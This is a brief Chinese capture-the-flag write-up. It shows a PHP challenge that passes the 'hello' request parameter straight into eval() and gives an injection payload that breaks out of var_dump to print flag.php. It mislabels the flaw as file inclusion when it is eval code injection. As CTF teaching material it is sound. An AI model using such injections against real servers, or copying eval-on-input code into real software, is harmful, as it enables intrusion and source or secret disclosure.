打开题目,直接显示代码
<?php
include "flag.php";
$a = @$_REQUEST['hello'];
eval( "var_dump($a);");
show_source(__FILE__);
?>
看到Request函数,很明显可以想到文件包含,这里hello是可控的,那么,就可以构造包含语句,
?hello=1);show_source('flag.php');var_dump(
就可以show flag.php 的源代码,从而得到flag。
注意事项:注意构造语句的闭合。